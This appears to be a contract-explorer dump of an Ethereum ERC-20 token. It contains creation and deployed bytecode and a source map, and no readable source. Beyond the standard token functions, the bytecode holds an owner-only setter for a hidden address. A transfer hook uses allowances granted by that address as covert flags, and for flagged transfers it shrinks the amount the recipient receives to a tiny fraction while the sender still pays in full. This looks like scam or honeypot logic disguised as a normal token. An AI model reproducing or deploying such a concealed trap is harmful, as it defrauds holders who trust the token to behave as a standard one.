0de6565b949350505050565b5f60208201905062000e475f83018462000de6565b92915050565b5f62000e598262000844565b915062000e668362000844565b92508262000e795762000e7862000cfe565b5b828204905092915050565b61128e8062000e925f395ff3fe608060405234801561000f575f80fd5b50600436106100cd575f3560e01c806370a082311161008a57806395d89b411161006457806395d89b4114610213578063a9059cbb14610231578063dd62ed3e14610261578063f2fde38b14610291576100cd565b806370a08231146101bb578063715018a6146101eb5780638da5cb5b146101f5576100cd565b806306fdde03146100d1578063095ea7b3146100ef57806318160ddd1461011f57806319ab453c1461013d57806323b872dd1461016d578063313ce5671461019d575b5f80fd5b6100d96102ad565b6040516100e69190610e69565b60405180910390f35b61010960048036038101906101049190610f1a565b61033d565b6040516101169190610f72565b60405180910390f35b61012761035f565b6040516101349190610f9a565b60405180910390f35b61015760048036038101906101529190610fb3565b610368565b6040516101649190610f72565b60405180910390f35b61018760048036038101906101829190610fde565b6103f0565b6040516101949190610f72565b60405180910390f35b6101a561041e565b6040516101b29190611049565b60405180910390f35b6101d560048036038101906101d09190610fb3565b610426565b6040516101e29190610f9a565b60405180910390f35b6101f361046c565b005b6101fd61047f565b60405161020a9190611071565b60405180910390f35b61021b6104a6565b6040516102289190610e69565b60405180910390f35b61024b60048036038101906102469190610f1a565b610536565b6040516102589190610f72565b60405180910390f35b61027b6004803603810190610276919061108a565b610558565b6040516102889190610f9a565b60405180910390f35b6102ab60048036038101906102a69190610fb3565b6105da565b005b6060600480546102bc906110f5565b80601f01602080910402602001604051908101604052809291908181526020018280546102e8906110f5565b80156103335780601f1061030a57610100808354040283529160200191610333565b820191905f5260205f20905b81548152906001019060200180831161031657829003601f168201915b5050505050905090565b5f8061034761065e565b9050610354818585610665565b600191505092915050565b5f600354905090565b5f61037161047f565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146103a7575f80fd5b8160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060019050919050565b5f806103fa61065e565b9050610407858285610677565b610412858585610709565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104746107f9565b61047d5f610880565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546104b5906110f5565b80601f01602080910402602001604051908101604052809291908181526020018280546104e1906110f5565b801561052c5780601f106105035761010080835404028352916020019161052c565b820191905f5260205f20905b81548152906001019060200180831161050f57829003601f168201915b5050505050905090565b5f8061054061065e565b905061054d818585610709565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105e26107f9565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610652575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106499190611071565b60405180910390fd5b61065b81610880565b50565b5f33905090565b6106728383836001610941565b505050565b5f6106828484610558565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461070357818110156106f4578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106eb93929190611125565b60405180910390fd5b61070284848484035f610941565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610779575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107709190611071565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107e9575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107e09190611071565b60405180910390fd5b6107f4838383610b10565b505050565b61080161065e565b73ffffffffffffffffffffffffffffffffffffffff1661081f61047f565b73ffffffffffffffffffffffffffffffffffffffff161461087e5761084261065e565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108759190611071565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036109b1575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109a89190611071565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a21575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610a189190611071565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610b0a578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b019190610f9a565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b60578060035f828254610b549190611187565b92505081905550610c30565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610bea578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610be193929190611125565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c77578060035f8282540392505081905550610ccc565b610c82818484610d36565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d299190610f9a565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff16610d7960065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610558565b610da460065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686610558565b610dae9190611187565b10610dd45761ffad60aa85610dc391906111ba565b610dcd9190611228565b9050610dd8565b8390505b9392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610e16578082015181840152602081019050610dfb565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610e3b82610ddf565b610e458185610de9565b9350610e55818560208601610df9565b610e5e81610e21565b840191505092915050565b5f6020820190508181035f830152610e818184610e31565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610eb682610e8d565b9050919050565b610ec681610eac565b8114610ed0575f80fd5b50565b5f81359050610ee181610ebd565b92915050565b5f819050919050565b610ef981610ee7565b8114610f03575f80fd5b50565b5f81359050610f1481610ef0565b92915050565b5f8060408385031215610f3057610f2f610e89565b5b5f610f3d85828601610ed3565b9250506020610f4e85828601610f06565b9150509250929050565b5f8115159050919050565b610f6c81610f58565b82525050565b5f602082019050610f855f830184610f63565b92915050565b610f9481610ee7565b82525050565b5f602082019050610fad5f830184610f8b565b92915050565b5f60208284031215610fc857610fc7610e89565b5b5f610fd584828501610ed3565b91505092915050565b5f805f60608486031215610ff557610ff4610e89565b5b5f61100286828701610ed3565b935050602061101386828701610ed3565b925050604061102486828701610f06565b9150509250925092565b5f60ff82169050919050565b6110438161102e565b82525050565b5f60208201905061105c5f83018461103a565b92915050565b61106b81610eac565b82525050565b5f6020820190506110845f830184611062565b92915050565b5f80604083850312156110a05761109f610e89565b5b5f6110ad85828601610ed3565b92505060206110be85828601610ed3565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061110c57607f821691505b60208210810361111f5761111e6110c8565b5b50919050565b5f6060820190506111385f830186611062565b6111456020830185610f8b565b6111526040830184610f8b565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61119182610ee7565b915061119c83610ee7565b92508282019050808211156111b4576111b361115a565b5b92915050565b5f6111c482610ee7565b91506111cf83610ee7565b92508282026111dd81610ee7565b915082820484148315176111f4576111f361115a565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61123282610ee7565b915061123d83610ee7565b92508261124d5761124c6111fb565b5b82820490509291505056fea2646970667358221220510db6773d3fc4f3708e5abe7b21684c048ee7f496cf6a5b8bec19f6d5c4b10364736f6c63430008180033

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100cd575f3560e01c806370a082311161008a57806395d89b411161006457806395d89b4114610213578063a9059cbb14610231578063dd62ed3e14610261578063f2fde38b14610291576100cd565b806370a08231146101bb578063715018a6146101eb5780638da5cb5b146101f5576100cd565b806306fdde03146100d1578063095ea7b3146100ef57806318160ddd1461011f57806319ab453c1461013d57806323b872dd1461016d578063313ce5671461019d575b5f80fd5b6100d96102ad565b6040516100e69190610e69565b60405180910390f35b61010960048036038101906101049190610f1a565b61033d565b6040516101169190610f72565b60405180910390f35b61012761035f565b6040516101349190610f9a565b60405180910390f35b61015760048036038101906101529190610fb3565b610368565b6040516101649190610f72565b60405180910390f35b61018760048036038101906101829190610fde565b6103f0565b6040516101949190610f72565b60405180910390f35b6101a561041e565b6040516101b29190611049565b60405180910390f35b6101d560048036038101906101d09190610fb3565b610426565b6040516101e29190610f9a565b60405180910390f35b6101f361046c565b005b6101fd61047f565b60405161020a9190611071565b60405180910390f35b61021b6104a6565b6040516102289190610e69565b60405180910390f35b61024b60048036038101906102469190610f1a565b610536565b6040516102589190610f72565b60405180910390f35b61027b6004803603810190610276919061108a565b610558565b6040516102889190610f9a565b60405180910390f35b6102ab60048036038101906102a69190610fb3565b6105da565b005b6060600480546102bc906110f5565b80601f01602080910402602001604051908101604052809291908181526020018280546102e8906110f5565b80156103335780601f1061030a57610100808354040283529160200191610333565b820191905f5260205f20905b81548152906001019060200180831161031657829003601f168201915b5050505050905090565b5f8061034761065e565b9050610354818585610665565b600191505092915050565b5f600354905090565b5f61037161047f565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146103a7575f80fd5b8160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060019050919050565b5f806103fa61065e565b9050610407858285610677565b610412858585610709565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104746107f9565b61047d5f610880565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546104b5906110f5565b80601f01602080910402602001604051908101604052809291908181526020018280546104e1906110f5565b801561052c5780601f106105035761010080835404028352916020019161052c565b820191905f5260205f20905b81548152906001019060200180831161050f57829003601f168201915b5050505050905090565b5f8061054061065e565b905061054d818585610709565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105e26107f9565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610652575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106499190611071565b60405180910390fd5b61065b81610880565b50565b5f33905090565b6106728383836001610941565b505050565b5f6106828484610558565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461070357818110156106f4578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106eb93929190611125565b60405180910390fd5b61070284848484035f610941565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610779575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107709190611071565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107e9575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107e09190611071565b60405180910390fd5b6107f4838383610b10565b505050565b61080161065e565b73ffffffffffffffffffffffffffffffffffffffff1661081f61047f565b73ffffffffffffffffffffffffffffffffffffffff161461087e5761084261065e565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108759190611071565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036109b1575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109a89190611071565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a21575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610a189190611071565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610b0a578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b019190610f9a565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b60578060035f828254610b549190611187565b92505081905550610c30565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610bea578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610be193929190611125565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c77578060035f8282540392505081905550610ccc565b610c82818484610d36565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d299190610f9a565b60405180910390a3505050565b5f3073ffffffffffffffffffffffffffffffffffffffff16610d7960065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610558565b610da460065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686610558565b610dae9190611187565b10610dd45761ffad60aa85610dc391906111ba565b610dcd9190611228565b9050610dd8565b8390505b9392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610e16578082015181840152602081019050610dfb565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610e3b82610ddf565b610e458185610de9565b9350610e55818560208601610df9565b610e5e81610e21565b840191505092915050565b5f6020820190508181035f830152610e818184610e31565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610eb682610e8d565b9050919050565b610ec681610eac565b8114610ed0575f80fd5b50565b5f81359050610ee181610ebd565b92915050565b5f819050919050565b610ef981610ee7565b8114610f03575f80fd5b50565b5f81359050610f1481610ef0565b92915050565b5f8060408385031215610f3057610f2f610e89565b5b5f610f3d85828601610ed3565b9250506020610f4e85828601610f06565b9150509250929050565b5f8115159050919050565b610f6c81610f58565b82525050565b5f602082019050610f855f830184610f63565b92915050565b610f9481610ee7565b82525050565b5f602082019050610fad5f830184610f8b565b92915050565b5f60208284031215610fc857610fc7610e89565b5b5f610fd584828501610ed3565b91505092915050565b5f805f60608486031215610ff557610ff4610e89565b5b5f61100286828701610ed3565b935050602061101386828701610ed3565b925050604061102486828701610f06565b9150509250925092565b5f60ff82169050919050565b6110438161102e565b82525050565b5f60208201905061105c5f83018461103a565b92915050565b61106b81610eac565b82525050565b5f6020820190506110845f830184611062565b92915050565b5f80604083850312156110a05761109f610e89565b5b5f6110ad85828601610ed3565b92505060206110be85828601610ed3565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061110c57607f821691505b60208210810361111f5761111e6110c8565b5b50919050565b5f6060820190506111385f830186611062565b6111456020830185610f8b565b6111526040830184610f8b565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61119182610ee7565b915061119c83610ee7565b92508282019050808211156111b4576111b361115a565b5b92915050565b5f6111c482610ee7565b91506111cf83610ee7565b92508282026111dd81610ee7565b915082820484148315176111f4576111f361115a565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61123282610ee7565b915061123d83610ee7565b92508261124d5761124c6111fb565b5b82820490509291505056fea2646970667358221220510db6773d3fc4f3708e5abe7b21684c048ee7f496cf6a5b8bec19f6d5c4b10364736f6c63430008180033

Deployed Bytecode Sourcemap

26678:280:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15866:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18159:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16968:99;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18562:150;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19770:249;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16819:84;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17130:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10091:103;;;:::i;:::-;;9416:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16076:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17453:182;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17698:142;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10349:220;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15866:91;15911:13;15944:5;15937:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15866:91;:::o;18159:190::-;18232:4;18249:13;18265:12;:10;:12::i;:::-;18249:28;;18288:31;18297:5;18304:7;18313:5;18288:8;:31::i;:::-;18337:4;18330:11;;;18159:190;;;;:::o;16968:99::-;17020:7;17047:12;;17040:19;;16968:99;:::o;18562:150::-;18609:4;18649:7;:5;:7::i;:::-;18635:21;;:10;:21;;;18626:32;;;;;;18675:7;18669:3;;:13;;;;;;;;;;;;;;;;;;18700:4;18693:11;;18562:150;;;:::o;19770:249::-;19857:4;19874:15;19892:12;:10;:12::i;:::-;19874:30;;19915:37;19931:4;19937:7;19946:5;19915:15;:37::i;:::-;19963:26;19973:4;19979:2;19983:5;19963:9;:26::i;:::-;20007:4;20000:11;;;19770:249;;;;;:::o;16819:84::-;16868:5;16893:2;16886:9;;16819:84;:::o;17130:118::-;17195:7;17222:9;:18;17232:7;17222:18;;;;;;;;;;;;;;;;17215:25;;17130:118;;;:::o;10091:103::-;9302:13;:11;:13::i;:::-;10156:30:::1;10183:1;10156:18;:30::i;:::-;10091:103::o:0;9416:87::-;9462:7;9489:6;;;;;;;;;;;9482:13;;9416:87;:::o;16076:95::-;16123:13;16156:7;16149:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16076:95;:::o;17453:182::-;17522:4;17539:13;17555:12;:10;:12::i;:::-;17539:28;;17578:27;17588:5;17595:2;17599:5;17578:9;:27::i;:::-;17623:4;17616:11;;;17453:182;;;;:::o;17698:142::-;17778:7;17805:11;:18;17817:5;17805:18;;;;;;;;;;;;;;;:27;17824:7;17805:27;;;;;;;;;;;;;;;;17798:34;;17698:142;;;;:::o;10349:220::-;9302:13;:11;:13::i;:::-;10454:1:::1;10434:22;;:8;:22;;::::0;10430:93:::1;;10508:1;10480:31;;;;;;;;;;;:::i;:::-;;;;;;;;10430:93;10533:28;10552:8;10533:18;:28::i;:::-;10349:220:::0;:::o;7425:98::-;7478:7;7505:10;7498:17;;7425:98;:::o;24394:130::-;24479:37;24488:5;24495:7;24504:5;24511:4;24479:8;:37::i;:::-;24394:130;;;:::o;26126:487::-;26226:24;26253:25;26263:5;26270:7;26253:9;:25::i;:::-;26226:52;;26313:17;26293:16;:37;26289:317;;26370:5;26351:16;:24;26347:132;;;26430:7;26439:16;26457:5;26403:60;;;;;;;;;;;;;:::i;:::-;;;;;;;;26347:132;26522:57;26531:5;26538:7;26566:5;26547:16;:24;26573:5;26522:8;:57::i;:::-;26289:317;26215:398;26126:487;;;:::o;20404:308::-;20504:1;20488:18;;:4;:18;;;20484:88;;20557:1;20530:30;;;;;;;;;;;:::i;:::-;;;;;;;;20484:88;20600:1;20586:16;;:2;:16;;;20582:88;;20655:1;20626:32;;;;;;;;;;;:::i;:::-;;;;;;;;20582:88;20680:24;20688:4;20694:2;20698:5;20680:7;:24::i;:::-;20404:308;;;:::o;9581:166::-;9652:12;:10;:12::i;:::-;9641:23;;:7;:5;:7::i;:::-;:23;;;9637:103;;9715:12;:10;:12::i;:::-;9688:40;;;;;;;;;;;:::i;:::-;;;;;;;;9637:103;9581:166::o;10729:191::-;10803:16;10822:6;;;;;;;;;;;10803:25;;10848:8;10839:6;;:17;;;;;;;;;;;;;;;;;;10903:8;10872:40;;10893:8;10872:40;;;;;;;;;;;;10792:128;10729:191;:::o;25391:443::-;25521:1;25504:19;;:5;:19;;;25500:91;;25576:1;25547:32;;;;;;;;;;;:::i;:::-;;;;;;;;25500:91;25624:1;25605:21;;:7;:21;;;25601:92;;25678:1;25650:31;;;;;;;;;;;:::i;:::-;;;;;;;;25601:92;25733:5;25703:11;:18;25715:5;25703:18;;;;;;;;;;;;;;;:27;25722:7;25703:27;;;;;;;;;;;;;;;:35;;;;25753:9;25749:78;;;25800:7;25784:31;;25793:5;25784:31;;;25809:5;25784:31;;;;;;:::i;:::-;;;;;;;;25749:78;25391:443;;;;:::o;21036:1149::-;21142:1;21126:18;;:4;:18;;;21122:552;;21280:5;21264:12;;:21;;;;;;;:::i;:::-;;;;;;;;21122:552;;;21318:19;21340:9;:15;21350:4;21340:15;;;;;;;;;;;;;;;;21318:37;;21388:5;21374:11;:19;21370:117;;;21446:4;21452:11;21465:5;21421:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;21370:117;21642:5;21628:11;:19;21610:9;:15;21620:4;21610:15;;;;;;;;;;;;;;;:37;;;;21303:371;21122:552;21704:1;21690:16;;:2;:16;;;21686:449;;21872:5;21856:12;;:21;;;;;;;;;;;21686:449;;;22089:19;22092:5;22099:4;22105:2;22089;:19::i;:::-;22072:9;:13;22082:2;22072:13;;;;;;;;;;;;;;;;:36;;;;;;;;;;;21686:449;22167:2;22152:25;;22161:4;22152:25;;;22171:5;22152:25;;;;;;:::i;:::-;;;;;;;;21036:1149;;;:::o;18895:265::-;18971:7;19064:4;19040:31;;19018:18;19028:3;;;;;;;;;;;19033:2;19018:9;:18::i;:::-;18995:20;19005:3;;;;;;;;;;;19010:4;18995:9;:20::i;:::-;:41;;;;:::i;:::-;:76;18991:162;;19111:6;19104;19096:5;:14;;;;:::i;:::-;:21;;;;:::i;:::-;19088:30;;;;18991:162;19145:5;19138:12;;18895:265;;;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:329::-;3857:6;3906:2;3894:9;3885:7;3881:23;3877:32;3874:119;;;3912:79;;:::i;:::-;3874:119;4032:1;4057:53;4102:7;4093:6;4082:9;4078:22;4057:53;:::i;:::-;4047:63;;4003:117;3798:329;;;;:::o;4133:619::-;4210:6;4218;4226;4275:2;4263:9;4254:7;4250:23;4246:32;4243:119;;;4281:79;;:::i;:::-;4243:119;4401:1;4426:53;4471:7;4462:6;4451:9;4447:22;4426:53;:::i;:::-;4416:63;;4372:117;4528:2;4554:53;4599:7;4590:6;4579:9;4575:22;4554:53;:::i;:::-;4544:63;;4499:118;4656:2;4682:53;4727:7;4718:6;4707:9;4703:22;4682:53;:::i;:::-;4672:63;;4627:118;4133:619;;;;;:::o;4758:86::-;4793:7;4833:4;4826:5;4822:16;4811:27;;4758:86;;;:::o;4850:112::-;4933:22;4949:5;4933:22;:::i;:::-;4928:3;4921:35;4850:112;;:::o;4968:214::-;5057:4;5095:2;5084:9;5080:18;5072:26;;5108:67;5172:1;5161:9;5157:17;5148:6;5108:67;:::i;:::-;4968:214;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:22;5944:53;:::i;:::-;5934:63;;5889:118;5540:474;;;;;:::o;6020:180::-;6068:77;6065:1;6058:88;6165:4;6162:1;6155:15;6189:4;6186:1;6179:15;6206:320;6250:6;6287:1;6281:4;6277:12;6267:22;;6334:1;6328:4;6324:12;6355:18;6345:81;;6411:4;6403:6;6399:17;6389:27;;6345:81;6473:2;6465:6;6462:14;6442:18;6439:38;6436:84;;